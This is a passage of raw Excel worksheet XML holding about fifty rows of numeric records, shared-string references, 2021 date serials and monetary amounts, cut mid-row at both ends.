        <v>12926</v>
      </c>
    </row>
    <row r="4164" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4164">
        <v>24578</v>
      </c>
      <c r="B4164">
        <v>658</v>
      </c>
      <c r="C4164" t="s">
        <v>16533</v>
      </c>
      <c r="D4164" t="s">
        <v>16534</v>
      </c>
      <c r="E4164">
        <v>24</v>
      </c>
      <c r="F4164" t="s">
        <v>12841</v>
      </c>
      <c r="G4164" s="1">
        <v>44319</v>
      </c>
      <c r="H4164" s="4">
        <v>120000</v>
      </c>
      <c r="J4164" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4165" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4165">
        <v>24579</v>
      </c>
      <c r="B4165">
        <v>658</v>
      </c>
      <c r="C4165" t="s">
        <v>16533</v>
      </c>
      <c r="D4165" t="s">
        <v>16534</v>
      </c>
      <c r="E4165">
        <v>24</v>
      </c>
      <c r="F4165" t="s">
        <v>13395</v>
      </c>
      <c r="G4165" s="1">
        <v>44319</v>
      </c>
      <c r="H4165" s="4">
        <v>360000</v>
      </c>
      <c r="J4165" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4166" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4166">
        <v>24580</v>
      </c>
      <c r="B4166">
        <v>792</v>
      </c>
      <c r="C4166" t="s">
        <v>1944</v>
      </c>
      <c r="D4166" t="s">
        <v>12003</v>
      </c>
      <c r="E4166">
        <v>16</v>
      </c>
      <c r="F4166" t="s">
        <v>9527</v>
      </c>
      <c r="G4166" s="1">
        <v>44298</v>
      </c>
      <c r="H4166">
        <v>60000</v>
      </c>
      <c r="J4166" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4167" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4167">
        <v>24581</v>
      </c>
      <c r="B4167">
        <v>792</v>
      </c>
      <c r="C4167" t="s">
        <v>1944</v>
      </c>
      <c r="D4167" t="s">
        <v>12003</v>
      </c>
      <c r="E4167">
        <v>16</v>
      </c>
      <c r="F4167" t="s">
        <v>11096</v>
      </c>
      <c r="G4167" s="1">
        <v>44298</v>
      </c>
      <c r="H4167">
        <v>240000</v>
      </c>
      <c r="J4167" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4168" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4168">
        <v>24582</v>
      </c>
      <c r="B4168">
        <v>792</v>
      </c>
      <c r="C4168" t="s">
        <v>1944</v>
      </c>
      <c r="D4168" t="s">
        <v>12003</v>
      </c>
      <c r="E4168">
        <v>16</v>
      </c>
      <c r="F4168" t="s">
        <v>9533</v>
      </c>
      <c r="G4168" s="1">
        <v>44298</v>
      </c>
      <c r="H4168">
        <v>60000</v>
      </c>
      <c r="J4168" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4169" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4169">
        <v>24583</v>
      </c>
      <c r="B4169">
        <v>792</v>
      </c>
      <c r="C4169" t="s">
        <v>1944</v>
      </c>
      <c r="D4169" t="s">
        <v>12003</v>
      </c>
      <c r="E4169">
        <v>16</v>
      </c>
      <c r="F4169" t="s">
        <v>3814</v>
      </c>
      <c r="G4169" s="1">
        <v>44298</v>
      </c>
      <c r="H4169">
        <v>240000</v>
      </c>
      <c r="J4169" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4170" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4170">
        <v>24584</v>
      </c>
      <c r="B4170">
        <v>5182</v>
      </c>
      <c r="C4170" t="s">
        <v>8584</v>
      </c>
      <c r="D4170" t="s">
        <v>13396</v>
      </c>
      <c r="E4170">
        <v>14</v>
      </c>
      <c r="F4170" t="s">
        <v>5647</v>
      </c>
      <c r="G4170" s="1">
        <v>44315</v>
      </c>
      <c r="H4170">
        <v>54000</v>
      </c>
      <c r="I4170" t="s">
        <v>9477</v>
      </c>
    </row>
    <row r="4171" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4171">
        <v>24585</v>
      </c>
      <c r="B4171">
        <v>5218</v>
      </c>
      <c r="C4171" t="s">
        <v>8584</v>
      </c>
      <c r="D4171" t="s">
        <v>13397</v>
      </c>
      <c r="E4171">
        <v>14</v>
      </c>
      <c r="F4171" t="s">
        <v>5647</v>
      </c>
      <c r="G4171" s="1">
        <v>44315</v>
      </c>
      <c r="H4171">
        <v>45000</v>
      </c>
      <c r="I4171" t="s">
        <v>9477</v>
      </c>
    </row>
    <row r="4172" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4172">
        <v>24586</v>
      </c>
      <c r="B4172">
        <v>1463</v>
      </c>
      <c r="C4172" t="s">
        <v>4296</v>
      </c>
      <c r="D4172" t="s">
        <v>13398</v>
      </c>
      <c r="E4172">
        <v>11</v>
      </c>
      <c r="F4172" t="s">
        <v>13399</v>
      </c>
      <c r="G4172" s="1">
        <v>44302</v>
      </c>
      <c r="H4172">
        <v>500000</v>
      </c>
      <c r="I4172" t="s">
        <v>9550</v>
      </c>
      <c r="J4172" t="s">
        <v>13400</v>
      </c>
    </row>
    <row r="4173" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4173">
        <v>24587</v>
      </c>
      <c r="B4173">
        <v>1452</v>
      </c>
      <c r="C4173" t="s">
        <v>2677</v>
      </c>
      <c r="D4173" t="s">
        <v>13401</v>
      </c>
      <c r="E4173">
        <v>26</v>
      </c>
      <c r="F4173" t="s">
        <v>364</v>
      </c>
      <c r="G4173" s="1">
        <v>44301</v>
      </c>
      <c r="H4173">
        <v>2000000</v>
      </c>
      <c r="I4173" t="s">
        <v>9436</v>
      </c>
      <c r="J4173" t="s">
        <v>13402</v>
      </c>
    </row>
    <row r="4174" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4174">
        <v>24588</v>
      </c>
      <c r="B4174">
        <v>1348</v>
      </c>
      <c r="C4174" t="s">
        <v>4506</v>
      </c>
      <c r="D4174" t="s">
        <v>13403</v>
      </c>
      <c r="E4174">
        <v>2</v>
      </c>
      <c r="F4174" t="s">
        <v>4508</v>
      </c>
      <c r="G4174" s="1">
        <v>44305</v>
      </c>
      <c r="H4174">
        <v>1000</v>
      </c>
      <c r="J4174" t="s">
        <v>13404</v>
      </c>
    </row>
    <row r="4175" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4175">
        <v>24589</v>
      </c>
      <c r="B4175">
        <v>4871</v>
      </c>
      <c r="C4175" t="s">
        <v>5612</v>
      </c>
      <c r="D4175" t="s">
        <v>11896</v>
      </c>
      <c r="E4175">
        <v>26</v>
      </c>
      <c r="F4175" t="s">
        <v>7564</v>
      </c>
      <c r="G4175" s="1">
        <v>44316</v>
      </c>
      <c r="H4175">
        <v>1000</v>
      </c>
      <c r="I4175" t="s">
        <v>13405</v>
      </c>
      <c r="J4175" t="s">
        <v>13406</v>
      </c>
    </row>
    <row r="4176" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4176">
        <v>24590</v>
      </c>
      <c r="B4176">
        <v>4871</v>
      </c>
      <c r="C4176" t="s">
        <v>5612</v>
      </c>
      <c r="D4176" t="s">
        <v>11896</v>
      </c>
      <c r="E4176">
        <v>26</v>
      </c>
      <c r="F4176" t="s">
        <v>10426</v>
      </c>
      <c r="G4176" s="1">
        <v>44316</v>
      </c>
      <c r="H4176">
        <v>7000</v>
      </c>
      <c r="I4176" t="s">
        <v>13405</v>
      </c>
      <c r="J4176" t="s">
        <v>13406</v>
      </c>
    </row>
    <row r="4177" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4177">
        <v>24591</v>
      </c>
      <c r="B4177">
        <v>4871</v>
      </c>
      <c r="C4177" t="s">
        <v>5612</v>
      </c>
      <c r="D4177" t="s">
        <v>11896</v>
      </c>
      <c r="E4177">
        <v>26</v>
      </c>
      <c r="F4177" t="s">
        <v>10667</v>
      </c>
      <c r="G4177" s="1">
        <v>44316</v>
      </c>
      <c r="H4177">
        <v>8000</v>
      </c>
      <c r="I4177" t="s">
        <v>13407</v>
      </c>
      <c r="J4177" t="s">
        <v>13406</v>
      </c>
    </row>
    <row r="4178" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4178">
        <v>24592</v>
      </c>
      <c r="B4178">
        <v>175</v>
      </c>
      <c r="C4178" t="s">
        <v>335</v>
      </c>
      <c r="D4178" t="s">
        <v>9850</v>
      </c>
      <c r="E4178">
        <v>6</v>
      </c>
      <c r="F4178" t="s">
        <v>9561</v>
      </c>
      <c r="G4178" s="1">
        <v>44287</v>
      </c>
      <c r="H4178">
        <v>250000</v>
      </c>
      <c r="I4178" t="s">
        <v>9485</v>
      </c>
      <c r="J4178" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4179" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4179">
        <v>24593</v>
      </c>
      <c r="B4179">
        <v>175</v>
      </c>
      <c r="C4179" t="s">
        <v>335</v>
      </c>
      <c r="D4179" t="s">
        <v>9850</v>
      </c>
      <c r="E4179">
        <v>6</v>
      </c>
      <c r="F4179" t="s">
        <v>9681</v>
      </c>
      <c r="G4179" s="1">
        <v>44287</v>
      </c>
      <c r="H4179">
        <v>27000</v>
      </c>
      <c r="I4179" t="s">
        <v>9485</v>
      </c>
      <c r="J4179" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4180" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4180">
        <v>24594</v>
      </c>
      <c r="B4180">
        <v>175</v>
      </c>
      <c r="C4180" t="s">
        <v>335</v>
      </c>
      <c r="D4180" t="s">
        <v>9850</v>
      </c>
      <c r="E4180">
        <v>6</v>
      </c>
      <c r="F4180" t="s">
        <v>9533</v>
      </c>
      <c r="G4180" s="1">
        <v>44287</v>
      </c>
      <c r="H4180">
        <v>3000</v>
      </c>
      <c r="I4180" t="s">
        <v>9485</v>
      </c>
      <c r="J4180" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4181" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4181">
        <v>24595</v>
      </c>
      <c r="B4181">
        <v>175</v>
      </c>
      <c r="C4181" t="s">
        <v>335</v>
      </c>
      <c r="D4181" t="s">
        <v>9850</v>
      </c>
      <c r="E4181">
        <v>6</v>
      </c>
      <c r="F4181" t="s">
        <v>9722</v>
      </c>
      <c r="G4181" s="1">
        <v>44287</v>
      </c>
      <c r="H4181">
        <v>3500</v>
      </c>
      <c r="I4181" t="s">
        <v>9485</v>
      </c>
      <c r="J4181" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4182" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4182">
        <v>24596</v>
      </c>
      <c r="B4182">
        <v>175</v>
      </c>
      <c r="C4182" t="s">
        <v>335</v>
      </c>
      <c r="D4182" t="s">
        <v>9850</v>
      </c>
      <c r="E4182">
        <v>6</v>
      </c>
      <c r="F4182" t="s">
        <v>10127</v>
      </c>
      <c r="G4182" s="1">
        <v>44287</v>
      </c>
      <c r="H4182">
        <v>15000</v>
      </c>
      <c r="I4182" t="s">
        <v>9485</v>
      </c>
      <c r="J4182" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4183" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4183">
        <v>24597</v>
      </c>
      <c r="B4183">
        <v>175</v>
      </c>
      <c r="C4183" t="s">
        <v>335</v>
      </c>
      <c r="D4183" t="s">
        <v>9850</v>
      </c>
      <c r="E4183">
        <v>6</v>
      </c>
      <c r="F4183" t="s">
        <v>9470</v>
      </c>
      <c r="G4183" s="1">
        <v>44287</v>
      </c>
      <c r="H4183">
        <v>135000</v>
      </c>
      <c r="I4183" t="s">
        <v>9485</v>
      </c>
      <c r="J4183" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="4184" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4184">
        <v>24598</v>
      </c>
      <c r="B4184">
        <v>2267</v>
      </c>
      <c r="C4184" t="s">
        <v>6309</v>
      </c>
      <c r="D4184" t="s">
        <v>9707</v>
      </c>
      <c r="E4184">
        <v>18</v>
      </c>
      <c r="F4184" t="s">
        <v>13408</v>
      </c>
      <c r="G4184" s="1">
        <v>44322</v>
      </c>
      <c r="H4184">
        <v>50000</v>
      </c>
      <c r="I4184" t="s">
        <v>13409</v>
      </c>
    </row>
    <row r="4185" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4185">
        <v>24599</v>
      </c>
      <c r="B4185">
        <v>1517</v>
      </c>
      <c r="C4185" t="s">
        <v>4513</v>
      </c>
      <c r="D4185" t="s">
        <v>13410</v>
      </c>
      <c r="E4185">
        <v>16</v>
      </c>
      <c r="F4185" t="s">
        <v>364</v>
      </c>
      <c r="G4185" s="1">
        <v>44287</v>
      </c>
      <c r="H4185">
        <v>6000</v>
      </c>
      <c r="J4185" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="4186" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4186">
        <v>24601</v>
      </c>
      <c r="B4186">
        <v>5440</v>
      </c>
      <c r="C4186" t="s">
        <v>8755</v>
      </c>
      <c r="D4186" t="s">
        <v>13411</v>
      </c>
      <c r="E4186">
        <v>6</v>
      </c>
      <c r="F4186" t="s">
        <v>8757</v>
      </c>
      <c r="G4186" s="1">
        <v>44291</v>
      </c>
      <c r="H4186">
        <v>1200</v>
      </c>
      <c r="I4186" t="s">
        <v>9852</v>
      </c>
      <c r="J4186" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="4187" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4187">
        <v>24602</v>
      </c>
      <c r="B4187">
        <v>1384</v>
      </c>
      <c r="C4187" t="s">
        <v>1719</v>
      </c>
      <c r="D4187" t="s">
        <v>11484</v>
      </c>
      <c r="E4187">
        <v>2</v>
      </c>
      <c r="F4187" t="s">
        <v>13412</v>
      </c>
      <c r="G4187" s="1">
        <v>44320</v>
      </c>
      <c r="H4187">
        <v>8500000</v>
      </c>
      <c r="J4187" t="s">
        <v>13413</v>
      </c>
    </row>
    <row r="4188" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4188">
        <v>24610</v>
      </c>
      <c r="B4188">
        <v>1129</v>
      </c>
      <c r="C4188" t="s">
        <v>3519</v>
      </c>
      <c r="D4188" t="s">
        <v>13414</v>
      </c>
      <c r="E4188">
        <v>16</v>
      </c>
      <c r="F4188" t="s">
        <v>13415</v>
      </c>
      <c r="G4188" s="1">
        <v>44287</v>
      </c>
      <c r="H4188">
        <v>0</v>
      </c>
      <c r="J4188" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="4189" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4189">
        <v>24612</v>
      </c>
      <c r="B4189">
        <v>1054</v>
      </c>
      <c r="C4189" t="s">
        <v>4519</v>
      </c>
      <c r="D4189" t="s">
        <v>13416</v>
      </c>
      <c r="E4189">
        <v>16</v>
      </c>
      <c r="F4189" t="s">
        <v>13417</v>
      </c>
      <c r="G4189" s="1">
        <v>44274</v>
      </c>
      <c r="H4189">
        <v>5000</v>
      </c>
      <c r="I4189" t="s">
        <v>13418</v>
      </c>
    </row>
    <row r="4190" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4190">
        <v>24613</v>
      </c>
      <c r="B4190">
        <v>1054</v>
      </c>
      <c r="C4190" t="s">
        <v>4519</v>
      </c>
      <c r="D4190" t="s">
        <v>13416</v>
      </c>
      <c r="E4190">
        <v>16</v>
      </c>
      <c r="F4190" t="s">
        <v>12130</v>
      </c>
      <c r="G4190" s="1">
        <v>44274</v>
      </c>
      <c r="H4190">
        <v>5000</v>
      </c>
      <c r="I4190" t="s">
        <v>13419</v>
      </c>
    </row>
    <row r="4191" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4191">
        <v>24614</v>
      </c>
      <c r="B4191">
        <v>1054</v>
      </c>
      <c r="C4191" t="s">
        <v>4519</v>
      </c>
      <c r="D4191" t="s">
        <v>13416</v>
      </c>
      <c r="E4191">
        <v>16</v>
      </c>
      <c r="F4191" t="s">
        <v>1746</v>
      </c>
      <c r="G4191" s="1">
        <v>44274</v>
      </c>
      <c r="H4191">
        <v>5000</v>
      </c>
    </row>
    <row r="4192" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4192">
        <v>24615</v>
      </c>
      <c r="B4192">
        <v>1054</v>
      </c>
      <c r="C4192" t="s">
        <v>4519</v>
      </c>
      <c r="D4192" t="s">
        <v>13416</v>
      </c>
      <c r="E4192">
        <v>16</v>
      </c>
      <c r="F4192" t="s">
        <v>9595</v>
      </c>
      <c r="G4192" s="1">
        <v>44274</v>
      </c>
      <c r="H4192">
        <v>5000</v>
      </c>
      <c r="I4192" t="s">
        <v>13420</v>
      </c>
    </row>
    <row r="4193" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4193">
        <v>24616</v>
      </c>
      <c r="B4193">
        <v>1054</v>
      </c>
      <c r="C4193" t="s">
        <v>4519</v>
      </c>
      <c r="D4193" t="s">
        <v>13416</v>
      </c>
      <c r="E4193">
        <v>16</v>
      </c>
      <c r="F4193" t="s">
        <v>12658</v>
      </c>
      <c r="G4193" s="1">
        <v>44274</v>
      </c>
      <c r="H4193">
        <v>10000</v>
      </c>
      <c r="I4193" t="s">
        <v>13421</v>
      </c>
    </row>
    <row r="4194" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4194">
        <v>24617</v>
      </c>
      <c r="B4194">
        <v>1054</v>
      </c>
      <c r="C4194" t="s">
        <v>4519</v>
      </c>
      <c r="D4194" t="s">
        <v>13416</v>
      </c>
      <c r="E4194">
        <v>16</v>
      </c>
      <c r="F4194" t="s">
        <v>9437</v>
      </c>
      <c r="G4194" s="1">
        <v>44274</v>
      </c>
      <c r="H4194">
        <v>3000</v>
      </c>
      <c r="I4194" t="s">
        <v>13422</v>
      </c>
    </row>
    <row r="4195" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4195">
        <v>24618</v>
      </c>
      <c r="B4195">
        <v>5475</v>
      </c>
      <c r="C4195" t="s">
        <v>5079</v>
      </c>
      <c r="D4195" t="s">
        <v>13423</v>
      </c>
      <c r="E4195">
        <v>12</v>
      </c>
      <c r="F4195" t="s">
        <v>8913</v>
      </c>
      <c r="G4195" s="1">
        <v>44312</v>
      </c>
      <c r="H4195">
        <v>300000</v>
      </c>
      <c r="I4195" t="s">
        <v>13424</v>
      </c>
    </row>
    <row r="4196" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4196">
        <v>24619</v>
      </c>
      <c r="B4196">
        <v>5475</v>
      </c>
      <c r="C4196" t="s">
        <v>5079</v>
      </c>
      <c r="D4196" t="s">
        <v>13423</v>
      </c>
      <c r="E4196">
        <v>12</v>
      </c>
      <c r="F4196" t="s">
        <v>13425</v>
      </c>
      <c r="G4196" s="1">
        <v>44312</v>
      </c>
      <c r="H4196">
        <v>600000</v>
      </c>
      <c r="I4196" t="s">
        <v>13426</v>
      </c>
      <c r="J4196" t="s">
        <v>13427</v>
      </c>
    </row>
    <row r="4197" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4197">
        <v>24620</v>
      </c>
      <c r="B4197">
        <v>5475</v>
      </c>
      <c r="C4197" t="s">
        <v>5079</v>
      </c>
      <c r="D4197" t="s">
        <v>13423</v>
      </c>
      <c r="E4197">
        <v>12</v>
      </c>
      <c r="F4197" t="s">
        <v>13428</v>
      </c>
      <c r="G4197" s="1">
        <v>44312</v>
      </c>
      <c r="H4197">
        <v>300000</v>
      </c>
      <c r="I4197" t="s">
        <v>13429</v>
      </c>
    </row>
    <row r="4198" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4198">
        <v>24621</v>
      </c>
      <c r="B4198">
        <v>5475</v>
      </c>
      <c r="C4198" t="s">
        <v>5079</v>
      </c>
      <c r="D4198" t="s">
        <v>13423</v>
      </c>
      <c r="E4198">
        <v>12</v>
      </c>
      <c r="F4198" t="s">
        <v>9561</v>
      </c>
      <c r="G4198" s="1">
        <v>44312</v>
      </c>
      <c r="H4198">
        <v>300000</v>
      </c>
      <c r="I4198" t="s">
        <v>13430</v>
      </c>
    </row>
    <row r="4199" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4199">
        <v>24622</v>
      </c>
      <c r="B4199">
        <v>5475</v>
      </c>
      <c r="C4199" t="s">
        <v>5079</v>
      </c>
      <c r="D4199" t="s">
        <v>13423</v>
      </c>
      <c r="E4199">
        <v>12</v>
      </c>
      <c r="F4199" t="s">
        <v>9438</v>
      </c>
      <c r="G4199" s="1">
        <v>44312</v>
      </c>
      <c r="H4199">
        <v>100000</v>
      </c>
      <c r="I4199" t="s">
        <v>13431</v>
      </c>
    </row>
    <row r="4200" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4200">
        <v>24623</v>
      </c>
      <c r="B4200">
        <v>2733</v>
      </c>
      <c r="C4200" t="s">
        <v>8671</v>
      </c>
      <c r="D4200" t="s">
        <v>13296</v>
      </c>
      <c r="E4200">
        <v>18</v>
      </c>
      <c r="F4200" t="s">
        <v>547</v>
      </c>
      <c r="G4200" s="1">
        <v>44312</v>
      </c>
      <c r="H4200">
        <v>6000</v>
      </c>
      <c r="I4200" t="s">
        <v>13297</v>
      </c>
      <c r="J4200" t="s">
        <v>13432</v>
      </c>
    </row>
    <row r="4201" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4201">
        <v>24624</v>
      </c>
      <c r="B4201">
        <v>2733</v>
      </c>
      <c r="C4201" t="s">
        <v>8671</v>
      </c>
      <c r="D4201" t="s">
        <v>13296</v>
      </c>
      <c r="E4201">
        <v>18</v>
      </c>
      <c r="F4201" t="s">
        <v>9928</v>
      </c>
      <c r="G4201" s="1">
        <v>44312</v>
      </c>
      <c r="H4201">
        <v>1500</v>
      </c>
      <c r="I4201" t="s">
        <v>13297</v>
      </c>
      <c r="J4201" t="s">
        <v>13433</v>
      </c>
    </row>
    <row r="4202" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4202">
        <v>24625</v>
      </c>
      <c r="B4202">
        <v>1589</v>
      </c>
      <c r="C4202" t="s">
        <v>4496</v>
      </c>
      <c r="D4202" t="s">
        <v>13434</v>
      </c>
      <c r="E4202">
        <v>12</v>
      </c>
      <c r="F4202" t="s">
        <v>9617</v>
      </c>
      <c r="G4202" s="1">
        <v>44358</v>
      </c>
      <c r="H4202">
        <v>1000</v>
      </c>
      <c r="I4202" t="s">
        <v>13435</v>
      </c>
    </row>
    <row r="4203" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4203">
        <v>24626</v>
      </c>
      <c r="B4203">
        <v>1589</v>
      </c>
      <c r="C4203" t="s">
        <v>4496</v>
      </c>
      <c r="D4203" t="s">
        <v>13434</v>
      </c>
      <c r="E4203">
        <v>12</v>
      </c>
      <c r="F4203" t="s">
        <v>11033</v>
      </c>
      <c r="G4203" s="1">
        <v>44358</v>
      </c>
      <c r="H4203">
        <v>4000</v>
      </c>
      <c r="I4203" t="s">
        <v>13436</v>
      </c>
    </row>
    <row r="4204" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4204">
        <v>24627</v>
      </c>
      <c r="B4204">
        <v>1589</v>
      </c>
      <c r="C4204" t="s">
        <v>4496</v>
      </c>
      <c r="D4204" t="s">
        <v>13434</v>
      </c>
      <c r="E4204">
        <v>12</v>
      </c>
      <c r="F4204" t="s">
        <v>13437</v>
      </c>
      <c r="G4204" s="1">
        <v>44358</v>
      </c>
      <c r="H4204">
        <v>2000</v>
      </c>
      <c r="I4204" t="s">
        <v>13435</v>
      </c>
    </row>
    <row r="4205" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4205">
        <v>24628</v>
      </c>
      <c r="B4205">
        <v>2733</v>
      </c>
      <c r="C4205" t="s">
        <v>8671</v>
      </c>
      <c r="D4205" t="s">
        <v>13296</v>
      </c>
      <c r="E4205">
        <v>18</v>
      </c>
      <c r="F4205" t="s">
        <v>13438</v>
      </c>
      <c r="G4205" s="1">
        <v>44312</v>
      </c>
      <c r="H4205">
        <v>2000</v>
      </c>
      <c r="I4205" t="s">
        <v>13297</v>
      </c>
      <c r="J4205" t="s">
        <v>13439</v>
      </c>
    </row>
    <row r="4206" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4206">
        <v>24630</v>
      </c>
      <c r="B4206">
        <v>1397</v>
      </c>
      <c r="C4206" t="s">
        <v>4472</v>
      </c>
      <c r="D4206" t="s">
        <v>13440</v>
      </c>
      <c r="E4206">
        <v>5</v>
      </c>
      <c r="F4206" t="s">
        <v>13441</v>
      </c>
      <c r="G4206" s="1">
        <v>44301</v>
      </c>
      <c r="H4206">
        <v>34986</v>
      </c>
      <c r="I4206" t="s">
        <v>10231</v>
      </c>
      <c r="J4206" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4207" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4207">
        <v>24631</v>
      </c>
      <c r="B4207">
        <v>1397</v>
      </c>
      <c r="C4207" t="s">
        <v>4472</v>
      </c>
      <c r="D4207" t="s">
        <v>13440</v>
      </c>
      <c r="E4207">
        <v>5</v>
      </c>
      <c r="F4207" t="s">
        <v>13442</v>
      </c>
      <c r="G4207" s="1">
        <v>44301</v>
      </c>
      <c r="H4207">
        <v>23324</v>
      </c>
      <c r="I4207" t="s">
        <v>10231</v>
      </c>
      <c r="J4207" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4208" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4208">
        <v>24632</v>
      </c>
      <c r="B4208">
        <v>1398</v>
      </c>
      <c r="C4208" t="s">
        <v>4480</v>
      </c>
      <c r="D4208" t="s">
        <v>13443</v>
      </c>
      <c r="E4208">
        <v>5</v>
      </c>
      <c r="F4208" t="s">
        <v>13444</v>
      </c>
      <c r="G4208" s="1">
        <v>44302</v>
      </c>
      <c r="H4208">
        <v>57624</v>
      </c>
      <c r="I4208" t="s">
        <v>10231</v>
      </c>
      <c r="J4208" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4209" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4209">
        <v>24633</v>
      </c>
      <c r="B4209">
        <v>1398</v>
      </c>
      <c r="C4209" t="s">
        <v>4480</v>
      </c>
      <c r="D4209" t="s">
        <v>13443</v>
      </c>
      <c r="E4209">
        <v>5</v>
      </c>
      <c r="F4209" t="s">
        <v>13445</v>
      </c>
      <c r="G4209" s="1">
        <v>44302</v>
      </c>
      <c r="H4209">
        <v>38416</v>
      </c>
      <c r="I4209" t="s">
        <v>10231</v>
      </c>
      <c r="J4209" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4210" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4210">
        <v>24634</v>
      </c>
      <c r="B4210">
        <v>5491</v>
      </c>
      <c r="C4210" t="s">
        <v>8776</v>
      </c>
      <c r="D4210" t="s">
        <v>13446</v>
      </c>
      <c r="E4210">
        <v>16</v>
      </c>
      <c r="F4210" t="s">
        <v>8778</v>
      </c>
      <c r="G4210" s="1">
        <v>44305</v>
      </c>
      <c r="H4210">
        <v>5000</v>
      </c>
      <c r="I4210" t="s">
        <v>13447</v>
      </c>
    </row>
    <row r="4211" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4211">
        <v>24635</v>
      </c>
      <c r="B4211">
        <v>632</v>
      </c>
      <c r="C4211" t="s">
        <v>2342</v>
      </c>
      <c r="D4211" t="s">
        <v>13448</v>
      </c>
      <c r="E4211">
        <v>26</v>
      </c>
      <c r="F4211" t="s">
        <v>2382</v>
      </c>
      <c r="G4211" s="1">
        <v>44313</v>
      </c>
      <c r="H4211">
        <v>240000</v>
      </c>
      <c r="J4211" t="s">
        <v>13267</v>
      </c>
    </row>
    <row r="4212" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4212">
        <v>24636</v>
      </c>
      <c r="B4212">
        <v>1278</v>
      </c>
      <c r="C4212" t="s">
        <v>4419</v>
      </c>
      <c r="D4212" t="s">
        <v>13449</v>
      </c>
      <c r="E4212">
        <v>2</v>
      </c>
      <c r="F4212" t="s">
        <v>10709</v>
      </c>
      <c r="G4212" s="1">
        <v>44299</v>
      </c>
      <c r="H4212">
        <v>28800000</v>
      </c>
      <c r="J4212" t="s">
        <v>13450</v>
      </c>
    </row>
    <row r="4213" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4213">
        <v>24637</v>
      </c>
      <c r="B4213">
        <v>1278</v>
      </c>
      <c r="C4213" t="s">
        <v>4419</v>
      </c>
      <c r="D4213" t="s">
        <v>13449</v>
      </c>
      <c r="E4213">
        <v>2</v>
      </c>
      <c r="F4213" t="s">
        <v>13451</v>
      </c>
      <c r="G4213" s="1">
        <v>44299</v>
      </c>
      <c r="H4213">
        <v>7200000</v>
      </c>
      <c r="I4213" t="s">
        <v>13452</v>
      </c>
      <c r="J4213" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="4214" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4214">
        <v>24638</v>
      </c>
      <c r="B4214">
        <v>1278</v>
      </c>
      <c r="C4214" t="s">
        <v>4419</v>
      </c>
      <c r="D4214" t="s">
        <v>13449</v>
      </c>
      <c r="E4214">
        <v>2</v>
      </c>
      <c r="F4214" t="s">
        <v>10708</v>
      </c>
      <c r="G4214" s="1">
        <v>44299</v>
      </c>
      <c r="H4214">
        <v>400000</v>
      </c>
      <c r="J4214" t="s">
        <v>13453</v>
      </c>
    </row>
    <row r="4215" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4215">
        <v>24639</v>
      </c>
      <c r="B4215">
        <v>773</v>
      </c>
      <c r="C4215" t="s">
        <v>1874</v>
      </c>
      <c r="D4215" t="s">
